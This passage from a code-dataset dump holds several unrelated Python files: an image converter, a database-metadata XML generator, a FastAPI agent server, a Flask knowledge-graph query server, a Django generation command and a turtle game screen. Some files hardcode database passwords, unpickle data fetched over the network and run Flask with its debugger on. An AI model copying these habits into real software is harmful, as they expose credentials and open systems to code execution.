\n# The resulting file, destname, should end with \".png\" and is the input image after\n# minimal demosaicing in png format with no compression.\ndef saveRawToPNG(imgname, destname):\n    \n    params = rawpy.Params(demosaic_algorithm=None, # because it changes nothing on our images anyway\n                      fbdd_noise_reduction=rawpy.FBDDNoiseReductionMode.Full, # min noise\n                      use_auto_wb=True, # computed automatically by rawpy, as in the course\n                      no_auto_bright=True, # no auto brightness, to avoid modifying the image for no reason\n                      no_auto_scale=False, # as far as I can tell, the linearization discussed in the course\n                      output_color=rawpy.ColorSpace.Adobe, # because the artists worked in some Adobe tool\n                      output_bps=8) # output values up to 256\n\n\n    \n    rawimg = rawpy.imread(imgname)\n    \n    rawpng = rawimg.postprocess(params) \n    # the image closest to what the artists imported into their editing program\n    # before retouching them; that way the GAN would not learn…\n    rawpng = cv2.cvtColor(rawpng, cv2.COLOR_BGR2RGB)\n    cv2.imwrite(destname, rawpng, [int(cv2.IMWRITE_PNG_COMPRESSION), 0])\n    #imageio.imsave(destname, rawpng)\n    \n# convert every image found under 'orig' with extension '.dng' \n# and save the results under 'dest' in png format\n# with a compression of 0\ndef convert(orig, dest):\n    ext = \".dng\"\n    progress = 0\n    for subdir, dirs, files in os.walk(orig):\n        for file in files:\n            filename = os.path.join(subdir, file)\n            if file.endswith(ext):\n                saveRawToPNG(filename, (dest+file).replace(ext,\".png\"))\n                progress += 1\n                print(\"progress: {}\".format(progress), end='\\r')\n
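\n# Example invocation (editor's illustration; assumes a folder of .dng files):\n#   python raw_to_adobe_png.py --origin ./raw/ --destination ./png/\n# Note: 'dest' is concatenated directly with each file name, so it should end with a path separator.\n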
\n# Converts all raw .dng images found under the folder given by the input\n# string parameter --origin into the folder given by the input \n# string parameter --destination. The resulting format is png with no compression.\n# The resulting image is a demosaiced version of the original.\nif __name__ == '__main__':\n    parse = argparse.ArgumentParser()\n    \n    parse.add_argument(\"-orig\", \"--origin\", help = 'the source folder', type = str)\n    parse.add_argument(\"-dest\", \"--destination\", help = 'the destination folder', type = str)\n    \n    args = parse.parse_args()\n    \n    orig = args.origin \n    dest = args.destination \n    \n    if orig is None:\n        print(\"Origin folder required. Use --help.\")\n        sys.exit()\n    if dest is None:\n        print(\"Destination folder required. Use --help.\")\n        sys.exit()\n\n    start = time.perf_counter()\n    convert(orig, dest)\n    print(\"process took: {}s\".format(time.perf_counter()-start))","repo_name":"MarcBickel/CS-413","sub_path":"raw_to_adobe_png.py","file_name":"raw_to_adobe_png.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"18719540469","text":"import requests\nimport jinja2\nimport os\nimport mysql.connector\nimport cx_Oracle\nfrom bs4 import BeautifulSoup\nfrom mysql.connector import Error as MySQLError\nfrom cx_Oracle import Error as OracleError\n\n\n\n############Function to get description tag values from a website############## \n\ndef getdata(link):\n    #page = requests.get('https://issues.apache.org/jira/browse/HIVE-16998')\n    page = requests.get(link)\n    print(page)\n    htmlContent = BeautifulSoup(page.content , \"html.parser\")\n    description=htmlContent.find(id=\"description-val\").get_text()\n    return description \n\n\n############Function to extract possible table name words############## \n\ndef extractTablename(data):\n    words=data.split(\" \")\n    tablename=[]\n    for word in words:\n        if \"_\" in word:\n            tablename.append(word)\n    return tablename\n\n\n############ Function to get Informatica native data type ###########\n\ndataTypeDictionary={}\ndef convertDataType():\n    mappingFile=open(\"mapping.csv\",'r')\n    mappingData=mappingFile.read()\n    line=mappingData.split('\\n')\n    for record in line:\n        data=record.split(',')\n        if(len(data[0])>0):\n            dataTypeDictionary[data[0]]=data[1]\n    #for type1,type2 in dataTypeDictionary.items():\n        #print(type1,type2)\n\n\n############Function to connect to Mysql##############\n\ndef connectToSource(data):\n    try:\n        conn = mysql.connector.connect(host='localhost',\n                                       database='INFORMATION_SCHEMA',\n                                       user='root',\n                                       password='sak###')\n        if conn.is_connected():\n            print('Connected to MySQL database')\n        output=[]\n        cursor = conn.cursor()\n        for table in data:\n            sourcelist=[]\n            query=(\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.tables where table_name=%s\")\n            cursor.execute(query,(table,))\n            results = cursor.fetchall()\n            for row in results:\n                print(\"Source Table \"+row[1]+\" is present in schema \"+row[0])\n                sourcelist.append('MySql')\n                sourcelist.append(row[0])\n                sourcelist.append(row[1])\n                query=(\"Select DATA_TYPE,ORDINAL_POSITION,\"+\n                       \"CASE WHEN COLUMN_KEY='PRI' THEN 'PRIMARY KEY' WHEN COLUMN_KEY='' THEN 'NOT A KEY' END,\"+\n                       \"COALESCE(NUMERIC_PRECISION,DATETIME_PRECISION,0),COLUMN_NAME,\"+\n                       \"CASE WHEN IS_NULLABLE='NO' THEN 'NOTNULL' WHEN IS_NULLABLE='YES' THEN 'NULL' END,\"+\n                       \"COALESCE(NUMERIC_PRECISION,CHARACTER_MAXIMUM_LENGTH,DATETIME_PRECISION),COALESCE(NUMERIC_SCALE,0) from columns where table_name=%s\")\n                cursor.execute(query,(row[1],))\n                column_details=cursor.fetchall()\n                #print(column_details) \n                output.append([sourcelist,column_details])\n                break\n        return output\n     \n    except MySQLError as e:\n        print(e)\n    \n    finally:\n        cursor.close()\n        conn.close()\n
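\n\n# Editor's note (illustrative, not from the original source): connectToSource returns a list of\n# [source_info, column_details] pairs; for a table named 'review' the result might look like\n# [[['MySql', 'mydb', 'review'], [('varchar', 1, 'PRIMARY KEY', 0, 'id', 'NOTNULL', 255, 0), ...]]],\n# with each tuple following the column order of the SELECT above.\n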
\n############Function to connect to Oracle##############\n\ndef connectToTarget(data):\n    connstr='scott/tiger'\n    try:\n        conn = cx_Oracle.connect(connstr)\n        cursor = conn.cursor()\n        output=[]\n        for table in data:\n            targetlist=[]\n            query='Select owner,table_name,tablespace_name,cluster_name from all_tables where table_name=:1'\n            cursor.execute(query,{'1':table.upper()})\n            #print(cursor.statement)\n            result=cursor.fetchall()\n            #print(result)\n            for row in result:\n                print(\"Target Table \"+row[1]+\" is present in tablespace \"+row[2])\n                targetlist.append('Oracle')\n                targetlist.append(row[1])\n                query='SELECT DATA_TYPE,COLUMN_ID,COLUMN_NAME,DATA_LENGTH,DATA_SCALE FROM ALL_TAB_COLUMNS WHERE TABLE_NAME=:1'\n                cursor.execute(query,{'1':table.upper()})\n                column_details=cursor.fetchall()\n                #print(column_details)\n                output.append([targetlist,column_details])\n                break\n        return output\n\n    except OracleError as e:\n        print(e)\n    \n    finally:\n        cursor.close()\n        conn.close()\n    \n\n############Function to render XML##############\n\ndef workflow(sourcedata,targetdata):\n\n    repository ={'name': 'RS_Dev', 'version': '182', 'codepage': 'MS1252', 'database':'Oracle'}\n    folder ={'name': 'Ankush', 'group': '', 'owner': 'Administrator', 'shared':'NOTSHARED'}\n    mapping ={'name': 'm_DYNAMIC_FILTER_VIA_PARAMETER'}\n    session ={'SCHEDULERNAME':'Scheduler','SERVERNAME':'RS_IS','SERVER_DOMAINNAME':'Domain_950'}\n    env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath=os.getcwd()))\n    template = env.get_template('workflow.XML')\n    finalOutput = template.render(repository=repository,folder=folder,\n                                  sourcedata=sourcedata,targetdata=targetdata,\n                                  mapping=mapping,dataTypeDictionary=dataTypeDictionary,session=session)\n    outFile = open('test5.xml',\"w\")\n    outFile.write(finalOutput)\n    outFile.close()\n\n    \n\n##########Main method#########\n    \nif __name__ == \"__main__\":\n    #link=input(\"Enter website link : \")\n    #data=getdata(link)\n    #print(data)\n    #tablename=extractTablename(data)\n    convertDataType()\n    sourcedata=connectToSource(['review','REVIEW_WRHS'])\n    targetdata=connectToTarget(['review','REVIEW_WRHS'])\n    workflow(sourcedata,targetdata)\n","repo_name":"ankushagarwal87/Python","sub_path":"Informatica Mapping Generation/Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"43531091581","text":"import logging\nimport math\nimport sys\nfrom collections import deque\nfrom dataclasses import asdict\nfrom datetime import datetime, timedelta\nfrom typing import List, Optional\n\nimport requests\nfrom ai_traineree.agents.agent_factory import AgentFactory\nfrom ai_traineree.types import AgentState, Experience\nfrom ai_traineree.types.primitive import ObservationType\nfrom fastapi import Depends, FastAPI, HTTPException\nfrom pydantic import BaseSettings, root_validator\n\nfrom .types import AgentAction, AgentCreate, AgentInfo, AgentLoss, AgentStateJSON, AgentStep, DataSpace\nfrom .utils import dataspace_fix, decode_pickle, encode_pickle\n\n# Initiate module with setting up a server\napp = FastAPI(\n    title=\"Agents Bar - Agent\",\n    description=\"Agents Bar compatible Agent entity\",\n    docs_url=\"/docs\",\n    version=\"0.1.2\",\n)\nlogging.basicConfig(level=logging.INFO, stream=sys.stdout)\nlogger = logging.getLogger()\n\nSUPPORTED_AGENTS = (\"DQN\", \"PPO\", \"DDPG\", \"SAC\", \"D3PG\", \"D4PG\", \"RAINBOW\", \"TD3\")\n\n\nclass AgentSettings(BaseSettings):\n    AGENT_ID: Optional[int]\n    TOKEN: Optional[str]\n    URL: Optional[str] = \"http://backend/api/v1/snapshots/auto\"\n    STANDALONE: bool = True\n\n    @root_validator\n    def check_not_standalone(cls, values):\n        standalone = values.get(\"STANDALONE\")\n        if not standalone:\n            assert all([v is not None for v in values.values()]), f\"No value should be None. {values.items()}\"\n        return values\n\n\nagent = None\nlast_step = {}\nlast_active = datetime.utcnow()\nlast_metrics_time = datetime.utcnow()\nmetrics_buffer = deque(maxlen=20)\n\n\ndef global_agent():\n    \"Global agent handling. 
It's mainly a helper function to handle exception.\"\n global agent\n if agent is None:\n raise HTTPException(status_code=404, detail=\"No agent found\")\n return agent\n\n\n@app.get(\"/ping\")\ndef ping():\n return {\"msg\": \"All good\"}\n\n\n@app.post(\"/agent\", status_code=201)\ndef api_post_agent(agent_create: AgentCreate):\n \"\"\"Create agent.\n\n The agent is reused by other methods. There is no \"update\" method to agent's interal state\n so in case it needs changes it should be deleted and recreated.\n\n \"\"\"\n global agent\n\n if agent_create.model_type.upper() not in SUPPORTED_AGENTS:\n raise HTTPException(status_code=400, detail=f\"Only {SUPPORTED_AGENTS} agent types are supported\")\n\n config = agent_create.model_config or {}\n agent_create.obs_space.shape = tuple(agent_create.obs_space.shape)\n agent_create.action_space.shape = tuple(agent_create.action_space.shape)\n config[\"obs_space\"] = agent_create.obs_space\n config[\"action_space\"] = agent_create.action_space\n\n network_state = agent_create.network_state\n buffer_state = agent_create.buffer_state\n\n agent_state = AgentState(\n model=agent_create.model_type,\n obs_space=agent_create.obs_space,\n action_space=agent_create.action_space,\n config=config,\n network=network_state,\n buffer=buffer_state,\n )\n try:\n agent = AgentFactory.from_state(agent_state)\n except:\n raise HTTPException(\n status_code=400,\n detail=\"It's not clear how you got here. Well done. But that's incorrect. Please select supported agent.\",\n )\n\n return {\"response\": \"Successfully created a new agent\"}\n\n\n@app.delete(\"/agent/{agent_name}\", status_code=204)\ndef api_delete_agent(agent_name: str, agent=Depends(global_agent)):\n \"\"\"Deletes agent and all related attribute. A hard reset.\n\n Agent name (reference) is necessary to prevent accidental deletion.\n \"\"\"\n if agent.name == agent_name:\n agent = None\n return {\"response\": \"Deleted successfully.\"}\n\n raise HTTPException(status_code=404, detail=f\"Agent '{agent_name}' not found\")\n\n\n@app.get(\"/agent\", response_model=AgentInfo)\ndef api_get_agent_info(agent=Depends(global_agent)):\n \"\"\"Describes agent.\n\n Provides summary information of the agent.\n The method should be relatively light.\n \"\"\"\n discret = agent.model.upper() in (\"DQN\", \"RAINBOW\")\n return AgentInfo(\n model=agent.model,\n hyperparameters=agent.hparams,\n last_active=last_active,\n discret=discret,\n )\n\n\n@app.get(\"/agent/state\", response_model=AgentStateJSON)\ndef api_get_agent_state(agent=Depends(global_agent)):\n \"\"\"Retruns agent's state.\n\n The state should be sufficient to fully describe and reconstruct the agent.\n It might be that in some situations the reconstructed agent doesn't produce\n the exact same output, e.g. 
due to internal randomness, but statistically\n they need to be the same.\n\n \"\"\"\n agent_state = agent.get_state()\n agent_config = agent_state.config\n agent_config[\"device\"] = str(agent_config.get(\"device\", \"cpu\"))\n\n if \"obs_space\" in agent_config:\n del agent_config[\"obs_space\"]\n if \"action_space\" in agent_config:\n del agent_config[\"action_space\"]\n\n return AgentStateJSON(\n model=agent_state.model,\n obs_space=asdict(agent_state.obs_space),\n action_space=asdict(agent_state.action_space),\n encoded_config=encode_pickle(agent_config),\n encoded_network=encode_pickle(agent_state.network),\n encoded_buffer=encode_pickle(agent_state.buffer),\n )\n\n\n@app.get(\"/agent/last_active\", response_model=datetime)\ndef api_get_agent_last_active(agent=Depends(global_agent)):\n \"\"\"Returns timestamp of agent's latest usage.\"\"\"\n return last_active\n\n\n@app.get(\"/agent/hparams\")\ndef api_get_agent_hparasm(agent=Depends(global_agent)):\n \"\"\"Returns hashmap of agent's hyperparameters.\"\"\"\n print(agent.hparams)\n return {\"hyperparameters\": agent.hparams}\n\n\n@app.get(\"/agent/loss\", response_model=List[AgentLoss])\ndef api_get_agent_loss(last_samples: int = 1, agent=Depends(global_agent)):\n \"\"\"Returns agent's loss values.\n\n By default it only returns the most recent metrics, i.e. single timestamp.\n Max timestamp values is based on the agent's intialization.\n \"\"\"\n if len(metrics_buffer) == 0:\n raise HTTPException(\n status_code=400,\n detail=f\"Not enough collected samples. Current count is {len(metrics_buffer)}.\",\n )\n beg_idx = max(0, len(metrics_buffer) - last_samples)\n return [metrics_buffer[i] for i in range(beg_idx, len(metrics_buffer))]\n\n\n@app.post(\"/agent/step\", status_code=200)\ndef api_post_agent_step(step: AgentStep, commit: bool = True, agent=Depends(global_agent)):\n \"\"\"Feed agent with step information.\n\n The minimum required is the current state and reward.\n Some agents, for convinience, might also require passing last action,\n auxilary infrmation whether state is terminal (done) and the next state.\n\n By default, the Step is committed to the agent in the request.\n In case it's needed to delay committing, e.g. 
gathering all information first,\n one can use `/agent/commit` method.\n\n \"\"\"\n # TODO: Agent should have a property whether it's discrete\n global last_active, last_step\n last_active = datetime.utcnow()\n if agent.model in (\"DQN\", \"Rainbow\"):\n action = int(step.action[0])\n else:\n action = step.action\n\n last_step = dict(\n last_step_obs=step.obs,\n last_action=action,\n last_step_reward=step.reward,\n last_step_next_obs=step.next_obs,\n last_step_done=step.done,\n )\n if commit:\n agent_commit(agent)\n return {\"response\": \"Stepping\"}\n\n return {\"response\": \"Submitted\"}\n\n\n@app.post(\"/agent/commit\", status_code=200)\ndef api_post_agent_commit(agent=Depends(global_agent)):\n \"\"\"Commits submitted step into Agent.\n\n Before using this method the data needs to be submitted using `/agent/step`.\n \"\"\"\n global last_active, last_step\n last_active = datetime.utcnow()\n agent_commit(agent)\n\n\n@app.post(\"/agent/reset\", status_code=200)\ndef api_post_agent_reset(agent=Depends(global_agent)):\n \"\"\"Resets Agent.\n\n Clears Agents states.\n \"\"\"\n agent.reset()\n\n\n@app.post(\"/agent/act\", response_model=AgentAction)\ndef api_post_agent_act(state: ObservationType, noise: float = 0.0, agent=Depends(global_agent)):\n \"\"\"Infers action based on provided observation.\"\"\"\n global last_active\n last_active = datetime.utcnow()\n try:\n exp = Experience(obs=state)\n exp = agent.act(exp, noise)\n action = exp.action\n except Exception as e:\n logger.exception(\"Failed to exceute `agent.act` with state=%s and noise=%s\", str(state), str(noise))\n raise HTTPException(status_code=500, detail=f\"Sorry :(\\n{e}\")\n\n collect_metrics()\n return AgentAction(action=action)\n\n\ndef agent_commit(agent):\n global last_step\n assert agent is not None, \"Agent needs to be initialized\"\n\n agent.step(\n Experience(\n obs=last_step[\"last_step_obs\"],\n action=last_step[\"last_action\"],\n reward=last_step[\"last_step_reward\"],\n next_obs=last_step[\"last_step_next_obs\"],\n done=last_step[\"last_step_done\"],\n )\n )\n last_step = {} # Empty once used\n\n collect_metrics()\n\n\ndef collect_metrics(wait_seconds: int = 20):\n global last_metrics_time\n if agent is None:\n raise ValueError(\"Agent needs to be initiated before it can be used\")\n\n now_time = datetime.utcnow()\n if now_time < last_metrics_time + timedelta(seconds=wait_seconds):\n return\n\n loss = {k: v if not (math.isinf(v) or math.isnan(v)) else None for (k, v) in agent.loss.items()}\n loss[\"time\"] = now_time.timestamp()\n metrics_buffer.append(loss)\n last_metrics_time = now_time\n\n\ndef sync_agent_state(agent_id: int, token: str) -> AgentState:\n logging.info(\"Synchronizing agent with the backend\")\n url = f\"{AgentSettings().URL}/{agent_id}\"\n response = requests.get(url, headers={\"token\": token})\n data = response.json()\n agent_type = data[\"model\"].upper()\n\n obs_space = dataspace_fix(data.pop(\"obs_space\"))\n action_space = dataspace_fix(data.pop(\"action_space\"))\n\n agent_config = decode_pickle(data[\"encoded_config\"])\n network_state = decode_pickle(data[\"encoded_network\"])\n buffer_state = decode_pickle(data[\"encoded_buffer\"])\n\n if \"obs_space\" in agent_config:\n agent_config.pop(\"obs_space\")\n if \"action_space\" in agent_config:\n agent_config.pop(\"action_space\")\n\n return AgentState(\n model=agent_type,\n obs_space=DataSpace(**obs_space),\n action_space=DataSpace(**action_space),\n config=agent_config,\n network=network_state,\n buffer=buffer_state,\n 
)\n\n\n##############################\n# MAIN\n\nconfig = AgentSettings()\n\nif not config.STANDALONE:\n    if config.AGENT_ID is None or config.TOKEN is None:\n        raise ValueError(\"AGENT_ID and TOKEN must be set when STANDALONE is false\")\n    state = sync_agent_state(config.AGENT_ID, config.TOKEN)\n    agent = AgentFactory.from_state(state=state)\n    print(\"Initiated agent: \" + str(agent))\n","repo_name":"Agents-Bar/agents-bar-agent","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"71680071034","text":"# coding=utf-8\nimport os\nimport json\nimport pickle\n\n\nimport numpy as np\nimport msgpack\nimport datetime\nfrom flask import Flask, request, jsonify\napp = Flask(__name__)\n\nclass Interpreter():\n    def __init__(self, freebase_dir):\n        self.map_program_to_func = {}\n        self.map_program_to_func[\"gen_set1\"] = self.execute_gen_set1\n        self.map_program_to_func[\"gen_set2\"] = self.execute_gen_set2\n        self.map_program_to_func[\"gen_set1_date\"] = self.execute_gen_set1_date\n        self.map_program_to_func[\"gen_set2_date\"] = self.execute_gen_set2_date\n        self.map_program_to_func[\"select_oper_date_lt\"] = self.execute_select_oper_date_lt\n        self.map_program_to_func[\"select_oper_date_gt\"] = self.execute_select_oper_date_gt\n        self.map_program_to_func[\"gen_set2_dateconstrained\"] = self.execute_gen_set2_dateconstrained\n        self.map_program_to_func[\"gen_set2_date_dateconstrained\"] = self.execute_gen_set2_date_dateconstrained\n        self.map_program_to_func[\"set_oper_ints\"] = self.execute_set_oper_ints\n        self.map_program_to_func[\"none\"] = self.execute_none\n        self.map_program_to_func[\"terminate\"] = self.execute_terminate\n\n    # whether (e, r) is contained in the knowledge graph\n    def is_kb_consistent(self, e, r):\n        print(\"find\", e, r)\n        if e in self.freebase_kb and r in self.freebase_kb[e]:\n            return True\n        else:\n            return False\n\n    # look up triples by entity and relation, similar to a SELECT\n    def execute_gen_set1(self, argument_value, argument_location):\n        entity = argument_value[0]\n        relation = argument_value[1]\n        if entity is None or relation is None:\n            return set([]), 1\n        tuple_set = None\n        if entity in self.freebase_kb and relation in self.freebase_kb[entity]:\n            tuple_set = self.freebase_kb[entity][relation]\n        return tuple_set, 0\n\n    # look up all date triples by entity and relation\n    def execute_gen_set1_date(self, argument_value, argument_location):\n        entity = argument_value[0]\n        relation_date = argument_value[1]\n        if entity is None or relation_date is None:\n            return set([]), 1\n        tuple_set = None\n        if entity in self.freebase_kb and relation_date in self.freebase_kb[entity]:\n            tuple_set = {d: entity for d in self.freebase_kb[entity][relation_date]}\n        return tuple_set, 0\n\n    def execute_gen_set2(self, argument_value, argument_location):\n        set_ent, _ = self.execute_gen_set1(argument_value, argument_location)\n        relation = argument_value[2]\n        if set_ent is None or relation is None:\n            return set([]), 1\n        tuple_set = None\n        for e in set_ent:\n            if e in self.freebase_kb and relation in self.freebase_kb[e]:\n                if tuple_set is None:\n                    tuple_set = set(self.freebase_kb[e][relation])\n                else:\n                    tuple_set.update(set(self.freebase_kb[e][relation]))\n        return tuple_set, 0\n\n    # does tails contain an element in the same year as y\n    def same_year(self, tails, y):\n        for t in tails:\n            t = self.convert_to_date(t).year\n            if t == y:\n                return True\n        return False\n
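\n    # Editor's note (illustrative example, not in the original source): with a KB entry like\n    # {'m.1': {'r.place_of_birth': ['m.2']}}, execute_gen_set1(['m.1', 'r.place_of_birth'], None)\n    # returns (['m.2'], 0), and (set(), 1) when either argument is None.\n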
\n    # date-constrained variant\n    def execute_gen_set2_dateconstrained(self, argument_value, argument_location):\n        set_ent, _ = self.execute_gen_set1(argument_value, argument_location)\n        relation = argument_value[2]\n        constr_rel_date = argument_value[3]\n        constr_date = argument_value[4]\n        if set_ent is None or relation is None or constr_rel_date is None or constr_date is None:\n            return set([]), 1\n        constr_year = constr_date.year\n        tuple_set = None\n        for e in set_ent:\n            if e in self.freebase_kb and constr_rel_date in self.freebase_kb[e] and self.same_year(\n                    self.freebase_kb[e][constr_rel_date], constr_year):\n                if relation not in self.freebase_kb[e]:\n                    continue\n                if tuple_set is None:\n                    tuple_set = set(self.freebase_kb[e][relation])\n                else:\n                    tuple_set.update(set(self.freebase_kb[e][relation]))\n        return tuple_set, 0\n\n    def execute_gen_set2_date(self, argument_value, argument_location):\n        set_ent, _ = self.execute_gen_set1(argument_value, argument_location)\n        relation_date = argument_value[2]\n        if set_ent is None or relation_date is None:\n            return set([]), 1\n        tuple_set = None\n        for e in set_ent:\n            if e in self.freebase_kb and relation_date in self.freebase_kb[e]:\n                if tuple_set is None:\n                    tuple_set = set(self.freebase_kb[e][relation_date])\n                else:\n                    tuple_set.update(set(self.freebase_kb[e][relation_date]))\n        return tuple_set, 0\n\n    # date-constrained variant over date triples\n    def execute_gen_set2_date_dateconstrained(self, argument_value, argument_location):\n        set_ent, _ = self.execute_gen_set1(argument_value, argument_location)\n        relation_date = argument_value[2]\n        constr_rel_date = argument_value[3]\n        constr_date = argument_value[4]\n        if set_ent is None or relation_date is None or constr_rel_date is None or constr_date is None:\n            return set([]), 1\n        constr_year = constr_date.year\n        tuple_set = None\n        for e in set_ent:\n            if e in self.freebase_kb and constr_rel_date in self.freebase_kb[e] and self.same_year(\n                    self.freebase_kb[e][constr_rel_date], constr_year):\n                if relation_date not in self.freebase_kb[e]:\n                    continue\n                if tuple_set is None:\n                    tuple_set = set(self.freebase_kb[e][relation_date])\n                else:\n                    tuple_set.update(set(self.freebase_kb[e][relation_date]))\n        return tuple_set, 0\n\n    # set intersection of two entity sets\n    def execute_set_oper_ints(self, argument_value, argument_location):\n        set_ent1 = argument_value[0]\n        set_ent2 = argument_value[1]\n        if set_ent1 is None or set_ent2 is None:\n            return set([]), 1\n        set_ent_ints = set(set_ent1).intersection(set(set_ent2))\n        flag = 0\n        if argument_location is not None:\n            argument_location1 = argument_location[0]\n            argument_location2 = argument_location[1]\n            if argument_location1 == argument_location2:\n                flag = 0.1\n        return set_ent_ints, flag\n\n    # convert a string to a date\n    def convert_to_date(self, x):\n        if x.startswith('m.'):\n            return None\n        if 'T' in x:\n            x = x.split('T')[0]\n        if len(x.split('-')) == 1:\n            x = x + '-01-01'\n        elif len(x.split('-')) == 2:\n            x = x + '-01'\n        try:\n            yyyy = int(x.split('-')[0])\n            mm = int(x.split('-')[1])\n            dd = int(x.split('-')[2])\n            d = datetime.datetime(yyyy, mm, dd)\n            return d\n        except Exception:\n            return None\n\n    # the set of entities whose date is <= the given date\n    def execute_select_oper_date_lt(self, argument_value, argument_location):\n        set_date = argument_value[0]\n        date = argument_value[1]\n        if set_date is None or date is None:\n            return set([]), 1\n        # set_date is a {date_string: entity} mapping (see execute_gen_set1_date);\n        # convert the keys to datetime objects while keeping the entity values\n        set_date = {self.convert_to_date(d): e for d, e in set_date.items()}\n        date = self.convert_to_date(date)\n        subset_date = set([])\n        for d, e in set_date.items():\n            if d <= date:\n                subset_date.add(e)\n        return subset_date, 0\n
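\n    # Editor's note (illustrative, not in the original source): convert_to_date pads partial dates,\n    # e.g. convert_to_date('1994') -> datetime(1994, 1, 1) and convert_to_date('1994-06') -> datetime(1994, 6, 1);\n    # it returns None for Freebase mids (strings starting with 'm.').\n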
\n    # the set of entities whose date is >= the given date\n    def execute_select_oper_date_gt(self, argument_value, argument_location):\n        set_date = argument_value[0]\n        date = argument_value[1]\n        if set_date is None or date is None:\n            return set([]), 1\n        # same {date_string: entity} conversion as in the lt variant above\n        set_date = {self.convert_to_date(d): e for d, e in set_date.items()}\n        date = self.convert_to_date(date)\n        subset_date = set([])\n        for d, e in set_date.items():\n            if d >= date:\n                subset_date.add(e)\n        return subset_date, 0\n\n    def execute_none(self, argument_value, argument_location):\n        return None, 0\n\n    def execute_terminate(self, argument_value, argument_location):\n        return None, 0\n\n\n@app.route('/post', methods = ['POST'])\ndef post_res():\n    response={}\n    jsonpack = json.loads(request.json)\n    if jsonpack['op'] == \"find\":\n        response['content']=interpreter.is_kb_consistent(jsonpack['sub'],jsonpack['pre'])\n    elif jsonpack['op']==\"execute_gen_set1\":\n        response['content']=interpreter.execute_gen_set1(jsonpack['sub_pre'], \"\")\n\n    # elif jsonpack['op']==\"find_reverse\":\n    #     response['content']=find_reverse(jsonpack['obj'],jsonpack['pre'])\n    # elif jsonpack['op']==\"is_A\":\n    #     response['content']=is_A(jsonpack['entity'])\n    # elif jsonpack['op']==\"select\":\n    #     response['content']=interpreter.execute_gen_set1(jsonpack['sub'],jsonpack['pre'],jsonpack['obj'])\n    # elif jsonpack['op']==\"select_All\":\n    #     response['content']=interpreter.execute_gen_set1(jsonpack['sub'],jsonpack['pre'],jsonpack['obj'])\n    # elif jsonpack['op']==\"is_All\":\n    #     response['content']=is_All(jsonpack['type'])\n    return jsonify(response)\n    \n\nif __name__ == '__main__':\n    print(\"loading knowledge base...\")\n    interpreter = Interpreter(\"\")\n    interpreter.freebase_kb = json.load(open('webQSP_freebase_subgraph.json'))\n    print(\"loading knowledge base done, starting the server\")\n\n    app.run(host='127.0.0.1', port=5001, use_debugger=True)\n","repo_name":"coin-qa-group/NS-CQA","sub_path":"S2SRL/webqspUtil/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"28000013436","text":"from django.core.exceptions import EmptyResultSet\nfrom django.db.utils import IntegrityError\nfrom django.core.management.base import BaseCommand, CommandError\nfrom backend.generator.combinator import Combinator\nfrom backend.corpora.manager import get_active_categories\n\nclass Command(BaseCommand):\n    help = 'Generates an article'\n\n    def add_arguments(self, parser):\n        parser.add_argument('--category', nargs=1, type=str, default=['politics'])\n        parser.add_argument('--outlet', nargs=1, type=str, default=['edition-cnn', 'cnn-money'])\n        parser.add_argument('--content-type', nargs=1, type=str, default=['news'])\n        parser.add_argument('--active-categories', nargs=1, type=bool, default=[False])\n        parser.add_argument('--fake-link', nargs=1, type=bool, default=[False])\n        parser.add_argument('--amount', nargs=1, type=int, default=[1])\n\n    def handle(self, *args, **options):\n        self.stdout.write('Generating new text:')\n\n        if options['active_categories'][0]:\n            categories = [c.slug for c in get_active_categories().filter(generateable=True)]\n            for category in categories:\n                self.generate(options['amount'][0], fake_link=options['fake_link'][0], category=category)\n\n        for category, outlet, content_type in zip(options['category'], options['outlet'], options['content_type']):\n            self.generate(options['amount'][0], fake_link=options['fake_link'][0], category=category, outlet=outlet, content_type=content_type)\n\n    def generate(self, amount, **kwargs):\n        combinator = Combinator(**kwargs)\n        msg = ''\n        for k, v in kwargs.items():\n            msg += '{}: {} '.format(k, v)\n        self.stdout.write(msg)\n\n        for i in range(0, amount):\n            self.combinate(combinator)\n
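\n    # Editor's note: combinate() below retries by recursing on any failure, so a persistently\n    # failing generator would recurse without bound. A bounded variant (sketch, not part of the\n    # original code) could thread a retry budget through the call:\n    #\n    #   def combinate(self, combinator, retries=5):\n    #       combinator.generate()\n    #       try:\n    #           combinator.finalize()\n    #       except Exception:\n    #           if retries > 0:\n    #               self.combinate(combinator, retries - 1)\n    #           else:\n    #               raise\n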
\n    def combinate(self, combinator):\n        combinator.generate()\n\n        try:\n            combinator.finalize()\n        except IntegrityError:\n            self.stdout.write('Generated Document Not Unique. Retrying ...')\n            self.combinate(combinator)\n        except AttributeError:\n            self.stdout.write('Malformed Document. Retrying ...')\n            self.combinate(combinator)\n        except Exception as e:\n            self.stdout.write('Error: {} Retrying ...'.format(e))\n            self.combinate(combinator)\n","repo_name":"TheWeeklyOutput/TWO-Backend","sub_path":"generator/management/commands/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"15724604754","text":"\"\"\" Project - end of a game\n\nwritten on 17/05/2023 by Jason\"\"\"\n\nfrom turtle import Turtle\n\n\ndef fin(message):\n    \"\"\" Function that displays the\n    'GAME OVER' message at the end of a game \"\"\"\n    stylo_fin = Turtle()\n    stylo_fin.speed(0)\n    stylo_fin.color(\"Red\")\n    stylo_fin.penup()\n    stylo_fin.goto(0, 0)\n    stylo_fin.write(message, move = False, align = \"center\",\n                    font = (\"Courier\" , 72, \"bold\"))\n    stylo_fin.hideturtle()\n\n\n\ndef relancer(message):\n    \"\"\" Function that explains how to restart a new game \"\"\"\n    stylo_rejouer = Turtle()\n    stylo_rejouer.speed(0)\n    stylo_rejouer.color(\"Yellow\")\n    stylo_rejouer.penup()\n    stylo_rejouer.hideturtle()\n    stylo_rejouer.goto(0, -50)\n    stylo_rejouer.write(message, move=False, align = \"center\",\n                        font = 